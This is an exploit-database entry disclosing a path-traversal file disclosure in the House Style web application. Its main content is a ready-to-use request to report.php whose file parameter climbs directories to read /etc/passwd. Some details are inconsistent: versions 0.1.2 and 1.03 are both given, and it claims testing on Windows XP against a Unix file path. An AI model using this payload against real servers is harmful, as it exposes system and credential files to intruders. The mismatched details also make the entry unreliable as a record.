id: 18959
date: 07/11/2012
title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
author: GoLd_M
cves: 

# Exploit Title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/housestyle/
# Version: 1.03
# Category:: readfile() Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[House Style 0.1.2]/report.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/aqz25984.jpg



#  0day.today [2023-03-23]  #